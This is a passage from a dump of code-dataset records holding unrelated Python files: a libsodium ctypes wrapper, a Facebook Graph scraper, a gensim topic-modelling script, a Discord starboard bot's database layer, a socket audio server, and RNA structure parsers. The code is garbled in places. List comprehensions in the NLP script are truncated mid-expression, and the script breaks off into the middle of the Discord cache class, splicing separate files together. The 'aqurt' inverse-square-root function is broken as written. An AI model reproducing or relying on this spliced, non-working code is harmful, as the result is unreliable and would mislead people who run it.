buf[256];\n size_t buflen;\n uint8_t last_node;\n ...;\n} crypto_generichash_state;\n\"\"\"\ncrypto_generichash_state = 8*12 + 256 + ctypes.sizeof(ctypes.c_size_t) + 1\n\ndef crypto_scalarmult_curve25519(n,p):\n buf = ctypes.create_string_buffer(crypto_scalarmult_BYTES)\n sodium.crypto_scalarmult_curve25519(buf, n, p)\n return buf.raw\n\ndef crypto_scalarmult_curve25519_base(n):\n buf = ctypes.create_string_buffer( crypto_scalarmult_BYTES)\n sodium.crypto_scalarmult_curve25519_base(buf, n)\n return buf.raw\n\n\n# crypto_generichash(unsigned char *out, size_t outlen, const unsigned char *in, unsigned long long inlen, const unsigned char *key, size_t keylen)\ndef crypto_generichash(m, k=b'', outlen=crypto_generichash_BYTES):\n buf = ctypes.create_string_buffer(outlen)\n if not sodium.crypto_generichash(buf, ctypes.c_uint(outlen), m, ctypes.c_ulonglong(len(m)), k, ctypes.c_uint(len(k))) == 0:\n raise ValueError\n return buf.raw\n\n#crypto_generichash_init(crypto_generichash_state *state, const unsigned char *key, const size_t keylen, const size_t outlen);\ndef crypto_generichash_init(outlen=crypto_generichash_BYTES, k=b''):\n buf = ctypes.create_string_buffer(crypto_generichash_state)\n sodium.crypto_generichash_init(buf, k, ctypes.c_ulonglong(len(k)), outlen)\n return buf.raw\n\n#crypto_generichash_update(crypto_generichash_state *state, const unsigned char *in, unsigned long long inlen);\ndef crypto_generichash_update(state, m):\n sodium.crypto_generichash_update(state, m, ctypes.c_ulonglong(len(m)))\n return state\n\n#crypto_generichash_final(crypto_generichash_state *state, unsigned char *out, const size_t outlen);\ndef crypto_generichash_final(state, outlen=crypto_generichash_BYTES):\n buf = ctypes.create_string_buffer(outlen)\n sodium.crypto_generichash_final(state, buf, outlen)\n return buf.raw\n\ndef randombytes(size):\n buf = ctypes.create_string_buffer(size)\n sodium.randombytes(buf, ctypes.c_ulonglong(size))\n return buf.raw\n\ndef crypto_box_keypair():\n pk = ctypes.create_string_buffer( crypto_box_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer( crypto_box_SECRETKEYBYTES)\n if not sodium.crypto_box_keypair(pk, sk) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_box(msg, nonce, pk, sk):\n if None in (msg, nonce, pk, sk): raise ValueError\n padded = b\"\\x00\" * crypto_box_ZEROBYTES + msg\n c = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_box(c, padded, ctypes.c_ulonglong(len(padded)), nonce, pk, sk) == 0:\n raise ValueError\n return c.raw[crypto_box_BOXZEROBYTES:]\n\ndef crypto_box_open(c, nonce, pk, sk):\n if None in (c, nonce, pk, sk): raise ValueError\n padded = b\"\\x00\" * crypto_box_BOXZEROBYTES + c\n msg = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_box_open(msg, padded, ctypes.c_ulonglong(len(padded)), nonce, pk, sk) == 0:\n raise ValueError\n return msg.raw[crypto_box_ZEROBYTES:]\n\ndef crypto_secretbox(msg, nonce, k):\n if None in (msg, nonce, k): raise ValueError\n padded = b\"\\x00\" * crypto_secretbox_ZEROBYTES + msg\n c = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_secretbox(c, padded, ctypes.c_ulonglong(len(padded)), nonce, k) == 0:\n raise ValueError\n return c.raw[crypto_secretbox_BOXZEROBYTES:]\n\ndef crypto_secretbox_open(c, nonce, k):\n if None in (c, nonce, k): raise ValueError\n padded = b\"\\x00\" * crypto_secretbox_BOXZEROBYTES + c\n msg = ctypes.create_string_buffer( len(padded))\n if not sodium.crypto_secretbox_open(msg, padded, ctypes.c_ulonglong(len(padded)), nonce, k) == 0:\n raise ValueError\n return msg.raw[crypto_secretbox_ZEROBYTES:]\n\ndef crypto_sign_keypair():\n pk = ctypes.create_string_buffer(crypto_sign_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer(crypto_sign_SECRETKEYBYTES)\n if not sodium.crypto_sign_keypair(pk, sk) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_sign_seed_keypair(seed):\n pk = ctypes.create_string_buffer(crypto_sign_PUBLICKEYBYTES)\n sk = ctypes.create_string_buffer(crypto_sign_SECRETKEYBYTES)\n if not sodium.crypto_sign_seed_keypair(pk, sk, seed) == 0:\n raise ValueError\n return (pk.raw, sk.raw)\n\ndef crypto_sign(m, sk):\n if None in (m, sk): raise ValueError\n smsg = ctypes.create_string_buffer(len(m)+crypto_sign_BYTES)\n smsglen = ctypes.pointer(ctypes.c_ulonglong())\n if not sodium.crypto_sign(smsg, smsglen, m, ctypes.c_ulonglong(len(m)), sk) == 0:\n raise ValueError\n return smsg.raw\n\ndef crypto_sign_open(sm, pk):\n if None in (sm, pk): raise ValueError\n msg = ctypes.create_string_buffer(len(sm))\n msglen = ctypes.c_ulonglong()\n msglenp = ctypes.pointer(msglen)\n if not sodium.crypto_sign_open(msg, msglenp, sm, ctypes.c_ulonglong(len(sm)), pk) == 0:\n raise ValueError\n return msg.raw[:msglen.value]\n\ndef crypto_stream(cnt, nonce = None, key = None):\n res = ctypes.create_string_buffer(cnt)\n if not nonce:\n nonce = randombytes(crypto_stream_NONCEBYTES)\n if not key:\n key = randombytes(crypto_stream_KEYBYTES)\n if not sodium.crypto_stream(res, ctypes.c_ulonglong(cnt), nonce, key) == 0:\n raise ValueError\n return res.raw\n\ndef crypto_stream_xor(msg, cnt, nonce = None, key = None):\n res = ctypes.create_string_buffer(cnt)\n if not nonce:\n nonce = randombytes(crypto_stream_NONCEBYTES)\n if not key:\n key = randombytes(crypto_stream_KEYBYTES)\n if not sodium.crypto_stream_xor(res, msg, ctypes.c_ulonglong(cnt), nonce, key) == 0:\n raise ValueError\n return res.raw\n\ndef test():\n import binascii\n\n crypto_stream(8)\n crypto_stream(1337)\n print(binascii.hexlify(crypto_stream(8)))\n print(binascii.hexlify(crypto_stream(16)))\n print(binascii.hexlify(crypto_stream(32)))\n print(binascii.hexlify(crypto_stream_xor('howdy', len('howdy'))))\n print(binascii.hexlify(crypto_stream_xor('howdy' * 16, len('howdy')*16)))\n\n print(binascii.hexlify(crypto_generichash('howdy')))\n state = crypto_generichash_init()\n state = crypto_generichash_update(state, 'howdy')\n print(binascii.hexlify(crypto_generichash_final(state)))\n print(binascii.hexlify(crypto_generichash('howdy', outlen=4)))\n print(binascii.hexlify(crypto_generichash('howdy', outlen=8)))\n state = crypto_generichash_init(outlen=6)\n state = crypto_generichash_update(state, 'howdy')\n print(binascii.hexlify(crypto_generichash_final(state, outlen=6)))\n\n pk, sk = crypto_box_keypair()\n n = randombytes(crypto_box_NONCEBYTES)\n c = crypto_box(\"howdy\", n, pk, sk)\n print(crypto_box_open(c, n, pk, sk))\n\n k = randombytes(crypto_secretbox_KEYBYTES)\n n = randombytes(crypto_secretbox_NONCEBYTES)\n c = crypto_secretbox(\"howdy\", n, k)\n print(crypto_secretbox_open(c, n, k))\n\n s = crypto_scalarmult_curve25519_base(randombytes(crypto_scalarmult_BYTES))\n r = crypto_scalarmult_curve25519_base(randombytes(crypto_scalarmult_BYTES))\n print('scalarmult')\n print(repr(crypto_scalarmult_curve25519(s,r)))\n\n pk, sk = crypto_sign_keypair()\n signed = crypto_sign('howdy',sk)\n changed = signed[:crypto_sign_BYTES]+'0'+signed[crypto_sign_BYTES+1:]\n print(crypto_sign_open(signed, pk))\n try:\n crypto_sign_open(changed, pk)\n except ValueError:\n print(\"signature failed to verify for changed payload\")\n\n seed = crypto_generichash('howdy', outlen=crypto_sign_SEEDBYTES)\n pk, sk = crypto_sign_seed_keypair(seed)\n pk2, sk2 = crypto_sign_seed_keypair(seed)\n print(binascii.hexlify(pk))\n print(binascii.hexlify(pk2))\n assert pk == pk2\n assert sk == sk2\n\nif __name__ == '__main__':\n test()\n","sub_path":"pysodium.py","file_name":"pysodium.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"344991638","text":"import urllib\nimport json\nimport datetime\nimport csv\nimport urllib\nfrom bs4 import BeautifulSoup\nfrom nltk import sent_tokenize, word_tokenize, pos_tag\nimport nltk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport codecs\n\nreader = codecs.getreader(\"utf-8\")\n\napp_id = \"12345\"\napp_secret = \"12345\"\n\naccess_token = app_id + \"|\" + app_secret\n\npage_id = 'costco'\n\ndef feedFacebook(page_id, access_token,num_statuses):\n base = \"https://graph.facebook.com/v2.8\"\n node = \"/\" + page_id + \"/feed\"\n parameters = \"/?fields=message,link,likes.limit(1).summary(true),comments.limit(1).summary(true),shares&limit=%s&access_token=%s\" % (num_statuses, access_token) # changed url = base + node +parameters\n url = base + node + parameters\n print(url)\n response = urllib.request.urlopen(url)\n data = json.load(reader(response))\n print(json.dumps(data, indent=4, sort_keys=True))\n b=json.dumps(data, indent=4, sort_keys=True)\n return data\na=feedFacebook(page_id, access_token,100)\n\na['data'][0]['message']\n\nfor k in range(0,10):\n print(a['data'][k]['message'])\n\ntxt=[]\nshare=[]\nfor i in range(0,50):\n txt.append(a['data'][0]['message'])\n\ntxt\n\ntokens = word_tokenize(str(a))\ntokens\n\nlong_words1 = [w for w in tokens if 7 1]\n for text in texts]\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/deerwester4.dict')\n\nprint(dictionary.token2id)\n\n\n## VETOR DAS FRASES\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/deerwester4.mm', corpus) # store to disk, for later use\nprint(corpus)\n\nfrom gensim import corpora, models, similarities\ntfidf = models.TfidfModel(corpus) # step 1 -- initialize a model\n\n\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n print(doc)\n\nlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=2) # initialize an LSI transformation\ncorpus_lsi = lsi[corpus_tfidf] # create a double wrapper over the original corpus: bow->tfidf->fold-in-lsi\n\nlsi.print_topics(2)\n\n## COORDENADAS DOS TEXTOS\ntodas=[]\nfor doc in corpus_lsi: # both bow->tfidf and tfidf->lsi transformations are actually executed here, on the fly\n todas.append(doc)\ntodas\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/deerwester4.dict')\ncorpus = corpora.MmCorpus('/tmp/deerwester4.mm') # comes from the first tutorial, \"From strings to vectors\"\nprint(corpus)\n\nnp.array(corpus).shape\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n\np=[]\nfor i in range(0,len(documents)):\n doc1 = documents[i]\n vec_bow2 = dictionary.doc2bow(doc1.lower().split())\n vec_lsi2 = lsi[vec_bow2] # convert the query to LSI space\n p.append(vec_lsi2)\n \np\n \nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester4.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester4.index')\n\n#################\n\nimport gensim\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib as mpl\n\nmatrix1 = gensim.matutils.corpus2dense(p, num_terms=2)\nmatrix3=matrix1.T\nmatrix3\n\nfrom sklearn import manifold, datasets, decomposition, ensemble,discriminant_analysis, random_projection\n\ndef norm(x):\n return (x-np.min(x))/(np.max(x)-np.min(x))\n\nX=norm(matrix3)\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0,perplexity=50,verbose=1,n_iter=1500)\nX_tsne = tsne.fit_transform(X)\n\n### WORK HERE - COMO DESCOBRI QUE TINHA 3 CLUSTERS ???? SORT X_tsne\n\nfrom sklearn.cluster import KMeans\nmodel3=KMeans(n_clusters=10,random_state=0)\nmodel3.fit(X)\ncc=model3.predict(X)\n\n## ALSO TRY COM X PARA VER QUE TOPICO SELECIONA\n\ntokens2 = word_tokenize(str(sentences[0:10]))\ntokens2\n\n## ADJUST HERE\nlong_words12 = [w for w in tokens2 if 5 self.limit:\n self._messages[guild].pop(0)\n\n async def get(self, guild: int, **kwargs):\n async with self.lock:\n return utils.get(self._messages.get(guild, []), **kwargs)\n\n async def remove(self, msg_id: int, guild: int):\n status = False\n async with self.lock:\n remove_index = None\n for x, msg in enumerate(self._messages.get(guild, [])):\n if msg.id == msg_id:\n remove_index = x\n if remove_index is not None:\n self._messages[guild].pop(remove_index)\n status = True\n return status\n\n async def set_listeners(self, event):\n @event\n async def on_raw_message_delete(payload):\n if payload.guild_id is None:\n return\n await self.remove(payload.message_id, payload.guild_id)\n\n @event\n async def on_message_edit(before, after):\n if before.guild is None:\n return\n status = await self.remove(before.id, before.guild.id)\n if status is True:\n await self.push(after, after.guild.id)\n\n @event\n async def on_raw_bulk_message_delete(payload):\n if payload.guild_id is None:\n return\n ids = payload.message_ids\n for id in ids:\n await self.remove(id, payload.guild_id)\n\n\nclass CommonSql(aobject):\n async def __init__(self, conn):\n self.create_guild = \\\n await conn.prepare(\n \"\"\"INSERT INTO guilds (id) VALUES($1)\"\"\"\n )\n self.create_prefix = \\\n await conn.prepare(\n \"\"\"INSERT INTO prefixes (guild_id, prefix)\n VALUES($1, $2)\"\"\"\n )\n self.create_user = \\\n await conn.prepare(\n \"\"\"INSERT INTO users (id, is_bot)\n VALUES($1, $2)\"\"\"\n )\n self.create_patron = \\\n await conn.prepare(\n \"\"\"INSERT INTO patrons (user_id, product_id)\n VALUES($1, $2)\"\"\"\n )\n self.create_vote = \\\n await conn.prepare(\n \"\"\"INSERT INTO votes (user_id, expires)\n VALUES($1, $2)\"\"\"\n )\n self.create_donation = \\\n await conn.prepare(\n \"\"\"INSERT INTO donations\n (txn_id, user_id, product_id, role_id, guild_id,\n email, price, currency, recurring, status)\n VALUES($1,$2,$3,$4,$5,$6,$7,$8,$9,$10)\"\"\"\n )\n self.create_member = \\\n await conn.prepare(\n \"\"\"INSERT INTO members (user_id, guild_id)\n VALUES($1,$2)\"\"\"\n )\n self.create_starboard = \\\n await conn.prepare(\n \"\"\"INSERT INTO starboards (id, guild_id)\n VALUES($1,$2)\"\"\"\n )\n self.create_sbemoji = \\\n await conn.prepare(\n \"\"\"INSERT INTO sbemojis (d_id, starboard_id,\n name, is_downvote)\n VALUES($1,$2,$3,$4)\"\"\"\n )\n self.create_aschannel = \\\n await conn.prepare(\n \"\"\"INSERT INTO aschannels (id, guild_id)\n VALUES($1, $2)\"\"\"\n )\n self.create_asemoji = \\\n await conn.prepare(\n \"\"\"INSERT INTO asemojis (aschannel_id, name)\n VALUES($1, $2)\"\"\"\n )\n self.create_message = \\\n await conn.prepare(\n \"\"\"INSERT INTO messages (id, guild_id,\n user_id, orig_message_id, channel_id,\n is_orig, is_nsfw)\n VALUES($1,$2,$3,$4,$5,$6,$7)\"\"\"\n )\n self.create_reaction = \\\n await conn.prepare(\n \"\"\"INSERT INTO reactions (guild_id,\n user_id, message_id, name)\n VALUES ($1,$2,$3,$4)\"\"\"\n )\n\n self.update_starboard = \\\n await conn.prepare(\n \"\"\"UPDATE starboards\n SET self_star=$1,\n link_edits=$2,\n link_deletes=$3,\n bots_on_sb=$4,\n required=$5,\n rtl=$6\n WHERE id=$7\"\"\"\n )\n\n\nclass Database:\n def __init__(self):\n self.lock = Lock()\n self.cooldowns = {\n 'giving_stars': {} # {user_id: cooldown_end_datetime}\n }\n self.conn = None\n\n async def open(self, bot):\n # self.q = await CommonSql()\n await self._create_tables()\n self.q = await CommonSql(await self.connect())\n self.cache = await BotCache(bot.event)\n\n async def connect(self):\n if self.conn is None:\n self.conn = await self.make_connection()\n return self.conn\n\n async def make_connection(self):\n conn = None\n try:\n conn = await apg.connect(\n host='localhost', database='starboard',\n user='starboard', password=db_pwd\n )\n # await conn.execute(\n # \"PRAGMA foreign_keys=True\"\n # )\n # conn.row_factory = self._dict_factory\n except Exception as e:\n print(f\"Couldn't connect to database: {e}\")\n if conn:\n await conn.close()\n return conn\n\n def _dict_factory(self, cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n async def _create_table(self, sql):\n conn = await self.connect()\n await conn.execute(sql)\n\n async def _create_index(self, sql):\n conn = await self.connect()\n await conn.execute(sql)\n\n async def _create_tables(self):\n guilds_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS guilds (\n id numeric PRIMARY KEY,\n\n stars_given integer NOT NULL DEFAULT 0,\n stars_recv integer NOT NULL DEFAULT 0\n )\"\"\"\n\n prefixes_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS prefixes (\n id SERIAL PRIMARY KEY,\n guild_id numeric NOT NULL,\n prefix VARCHAR(8),\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n users_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS users (\n id numeric PRIMARY KEY,\n is_bot bool NOT NULL,\n\n lvl_up_msgs bool DEFAULT True\n )\"\"\"\n\n patrons_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS patrons (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n product_id text NOT NULL\n )\"\"\"\n\n votes_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS votes (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n expires numeric NOT NULL,\n expired bool DEFAULT false,\n\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE\n )\"\"\"\n\n donations_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS donations (\n id SERIAL PRIMARY KEY,\n txn_id integer NOT NULL,\n user_id integer NOT NULL,\n product_id text DEFAULT NULL,\n role_id numeric DEFAULT NULL,\n guild_id integer NOT NULL,\n\n email text NOT NULL,\n price integer NOT NULL,\n currency text NOT NULL,\n\n recurring bool NOT NULL,\n status text NOT NULL\n )\"\"\"\n\n members_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS members (\n id SERIAL PRIMARY KEY,\n user_id numeric NOT NULL,\n guild_id numeric NOT NULL,\n\n given int NOT NULL DEFAULT 0,\n received int NOT NULL DEFAULT 0,\n\n xp int NOT NULL DEFAULT 0,\n lvl int NOT NULL DEFAULT 0,\n\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE,\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n starboards_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS starboards (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n\n required int NOT NULL DEFAULT 3,\n rtl int NOT NULL DEFAULT 0,\n\n self_star bool NOT NULL DEFAULT false,\n link_edits bool NOT NULL DEFAULT true,\n link_deletes bool NOT NULL DEFAULT false,\n bots_on_sb bool NOT NULL DEFAULT true,\n\n locked bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n sbemoijs_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS sbemojis (\n id SERIAL PRIMARY KEY,\n d_id numeric,\n starboard_id numeric NOT NULL,\n\n name text NOT NULL,\n is_downvote bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (starboard_id) REFERENCES starboards (id)\n ON DELETE CASCADE\n )\"\"\"\n\n aschannels_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS aschannels (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n\n min_chars int NOT NULL DEFAULT 0,\n require_image bool NOT NULL DEFAULT False,\n delete_invalid bool NOT NULL DEFAULT False\n )\"\"\"\n\n asemojis_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS asemojis (\n id SERIAL PRIMARY KEY,\n aschannel_id numeric NOT NULL,\n\n name text NOT NULL,\n\n FOREIGN KEY (aschannel_id) REFERENCES aschannels (id)\n ON DELETE CASCADE\n )\"\"\"\n\n messages_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS messages (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n user_id numeric NOT NULL,\n orig_message_id numeric DEFAULT NULL,\n channel_id numeric NOT NULL,\n\n is_orig bool NOT NULL,\n is_nsfw bool NOT NULL,\n is_trashed bool NOT NULL DEFAULT false,\n is_frozen bool NOT NULL DEFAULT false,\n is_forced bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE,\n FOREIGN KEY (user_id) REFERENCES users (id),\n FOREIGN KEY (orig_message_id) REFERENCES messages (id)\n ON DELETE CASCADE\n )\"\"\"\n\n reactions_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS reactions (\n id SERIAL PRIMARY KEY,\n guild_id numeric NOT NULL,\n user_id numeric NOT NULL,\n message_id numeric NOT NULL,\n\n name text NOT NULL,\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE,\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE,\n FOREIGN KEY (message_id) REFERENCES messages (id)\n )\"\"\"\n\n delete_reaction_index = \\\n \"\"\"CREATE INDEX IF NOT EXISTS delete_reaction\n ON reactions(message_id, user_id, name)\"\"\"\n\n await self.lock.acquire()\n await self._create_table(guilds_table)\n await self._create_table(prefixes_table)\n await self._create_table(users_table)\n await self._create_table(patrons_table)\n await self._create_table(votes_table)\n await self._create_table(donations_table)\n await self._create_table(members_table)\n await self._create_table(starboards_table)\n await self._create_table(sbemoijs_table)\n await self._create_table(aschannels_table)\n await self._create_table(asemojis_table)\n await self._create_table(messages_table)\n await self._create_table(reactions_table)\n\n await self._create_index(delete_reaction_index)\n self.lock.release()\n","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"208291230","text":"import wave\r\nimport pyaudio\r\nfrom socket import *\r\nimport sys\r\nfrom select import *\r\n\r\nCHUNK = 1024\r\nFORMAT = pyaudio.paInt16\r\nCHANNELS = 1\r\nRATE = 16000\r\nWAVE_OUTPUT_FILE = \"server_out.wav\"\r\nWIDTH = 2\r\nframes = []\r\n\r\n# SOCKET setting\r\nHOST = ''\r\nPORT = 10001\r\nBUFSIZE = 1024\r\nADDR = (HOST, PORT)\r\n\r\np = pyaudio.PyAudio()\r\nstream = p.open(format = p.get_format_from_width(WIDTH),\r\n channels = CHANNELS,\r\n rate = RATE,\r\n output = True,\r\n frames_per_buffer = CHUNK)\r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.bind(ADDR)\r\n\r\nprint(\"Server start\")\r\nserverSocket.listen(1)\r\nclientSocket, client_addr = serverSocket.accept()\r\nprint('connected by', client_addr)\r\n\r\ndata = clientSocket.recv(CHUNK)\r\n\r\ni = 1\r\nprint('data receive')\r\nwhile data != '':\r\n stream.write(data)\r\n\r\n try:\r\n data = clientSocket.recv(CHUNK)\r\n #print('%d receive' %len(data))\r\n except Exception as e:\r\n print(e)\r\n clientSocket.close\r\n break\r\n \r\n if i % (int(RATE/1024*4*WIDTH)) == 0 :\r\n print( str(i/(int(RATE/1024))) +\"sec\")\r\n \r\n try:\r\n print(\"wave open\")\r\n wf = wave.open(\"./wav/%03d_sec.wav\"%((i/(int(RATE/1024)))),'wb')\r\n wf.setnchannels(CHANNELS)\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n wf.setframerate(RATE)\r\n wf.writeframes(b''.join(frames))\r\n print(\"wave closed\")\r\n wf.close()\r\n # clientSocket.send(\"that is %d framse\"%(i))\r\n frames =[]\r\n except Exception as e:\r\n print(e)\r\n clientSocket.close()\r\n i= i+1\r\n frames.append(data)\r\n\r\nwf = wave.open(WAVE_OUTPUT_FILE,'wb')\r\nwf.setnchannels(CHANNELS)\r\nwf.setsampwidth(p.get_sample_size(FORMAT))\r\nwf.setframerate(RATE)\r\nwf.writeframes(b''.join(frames))\r\nwf.close()\r\n\r\nstream.stop_stream()\r\nstream.close()\r\np.terminate()\r\nclientSocket.close() #소켓 종료\r\nserverSocket.close()\r\n\r\nprint('close')\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"69297451","text":"# -*-coding:utf-8-*-\n# AUTHOR:tyltr\n# TIME :2018/10/24\n\n\ndef aqurt(n):\n n_half = n>>1\n i = 0x5f3759df - n_half\n n = n*(1.5 - n_half*n*n)\n return n\n\nif __name__ == '__main__':\n print(aqurt(4))\n","sub_path":"Algorithms/squrt.py","file_name":"squrt.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"237948700","text":"def get_clusters():\n result,result2,result3 =[],[],[]\n for i in open('out','r'):\n #prfasta_chain.npyint i\n if 'ZZZ' in i:\n if i[-1] == '\\n':\n i = i[0:-1]\n result += [ int(i.split('ZZZ')[1].split('(')[0]),]\n if result[-1] > 35:\n if result[-1] < 1000:\n #print i.split('|')[0][-4:],i.split('Chain(s): ')[1].split(';')[0].strip()\n result2 += [i.split('ZZZ')[1].split(')')[1].split(','),]\n\n temp = {}\n for i in result2:\n for j in i:\n pdb, chain = j.strip().split('|')[0].lower(),j.strip().split('|')[2]\n if j[1:5] not in temp:\n temp[j[1:5]] = [pdb+'_'+chain.lower(),]\n else:\n temp[j[1:5]] += [pdb+'_'+chain.lower(),]\n\n import pandas as pd\n rsln_data = pd.read_csv('resln.csv')\n pdb_map_rsn = {}\n for i in range(len(rsln_data)):\n if 'NMR' in rsln_data.iloc[i]['Exp. Method']:\n temp2 = rsln_data.set_value(i,'Resolution',20)\n pdb_map_rsn[rsln_data.iloc[i]['PDB ID']] = (round(rsln_data.iloc[i]['Resolution'],1),\\\n rsln_data.iloc[i]['Exp. Method'])\n result2_resln = []\n for group in result2:\n temp2 = []\n for j in group:\n pdb = j.strip().split('|')[0]\n temp2 += [pdb_map_rsn[pdb.upper()] + (j,),]\n result2_resln += [temp2,]\n for i in result2_resln:\n None#print sorted(i)[0:5]\n return result2_resln,result,result2,result3,temp\n#result2_resln,result,result2,result3,temp = get_clusters()\nimport numpy as np\ndef get_pdb_seq(ii):\n f1 = open(ii.lower()+'.pdb','r')\n #full_seq0 = pdb_seq_chain[ii]\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n for line in f1:\n if 'ATOM' in line and line[12:16].strip() == \"P\" :\n #print line\n if line[17:20].strip() in ['A','U','G','C']:\n if first_resi is True :\n first_resi = int(line[22:26].strip()) -1\n #print line\n resNum,resiType = (int(line[22:26].strip())- first_resi,line[17:20].strip())\n X = np.array(float(line[30:38].strip()))\n Y = np.array(float(line[38:46].strip()))\n Z = np.array(float(line[46:54].strip()))\n cord[resNum] = [resiType,np.array([X,Y,Z])]\n else: None#print line[17:20].strip()\n Resi_map = {}\n pdb_seq0 = ''\n for i in range(1,1+max(cord.keys())):\n if i in cord.keys():\n pdb_seq0 += cord[i][0]\n else:\n pdb_seq0 += 'X'\n return pdb_seq0\npdb_seq_chain = np.load('fasta_chain_TEST.npy').item()\ndef get_cif( ii ='1b23_r',pdb_seq=False,format='cif'):\n chain = ii[5:].lower()\n #print chain\n f1 = open('../cif/'+ii.lower()[0:4]+'.cif','r')\n if pdb_seq is False:\n full_seq0 = pdb_seq_chain[ii]\n else:\n full_seq0 = pdb_seq\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n if format =='cif':\n for line in f1:\n if 'ATOM' in line and len(line.split())>=19 :#'\"C1\\'\"' \\\n if line.split()[5] in ['A','U','G','C'] and line.split()[-2] == 'P'\\\n and line.split()[-3].upper() == chain.upper():\n #print line.split()\n if first_resi is True :\n first_resi = int(line.split()[8]) -1\n #print line\n resNum,resiType = (int(line.split()[8])- first_resi,line.split()[5])\n X = np.array(float(line.split()[10]))\n Y = np.array(float(line.split()[11]))\n Z = np.array(float(line.split()[12]))\n cord[(line.split()[-3].lower(),resNum)] = [resiType,np.array([X,Y,Z])]\n elif format == 'pdb':\n f1 = open('./'+ii.lower()[0:4]+'_2.pdb','r')\n for line in f1:\n if 'ATOM' in line and line[17:20].strip() in ['A','U','G','C'] and line[12:16].strip() == 'P'\\\n and line[21].upper() == chain.upper():\n if first_resi is True :\n first_resi = int(line[22:26].strip()) -1\n #print line\n resNum,resiType = (int(line[22:26].strip())- first_resi,line[17:20].strip())\n X = np.array(float(line[30:38].strip()))\n Y = np.array(float(line[38:46].strip()))\n Z = np.array(float(line[46:54].strip()))\n cord[(line[21].lower(),resNum)] = [resiType,np.array([X,Y,Z])] \n \n Resi_map = {}\n pdb_seq0 = ''\n chain_resi = []\n cord_chain ={}\n for i in sorted(cord.keys()):\n if i[0] == chain:\n chain_resi += [i,]\n cord_chain[i] = cord[i]\n for i in range(1,1+max(chain_resi)[1]):\n if (chain,i) in cord.keys():\n pdb_seq0 += cord[(chain,i)][0]\n else:\n pdb_seq0 += 'X'\n return pdb_seq0, full_seq0, cord_chain\n\ndef get_cif_entirePDB( ii ='1b23_r'):\n chain = ii[5:].lower()\n #print chain\n f1 = open('../cif/'+ii.lower()[0:4]+'.cif','r')\n full_seq0 = pdb_seq_chain[ii]\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n for line in f1:\n if 'ATOM' in line and len(line.split())>=19 :#'\"C1\\'\"' \\\n if line.split()[-3].upper() == chain.upper():\n #print line.split()\n if first_resi is True :\n first_resi = int(line.split()[8]) -1\n #print 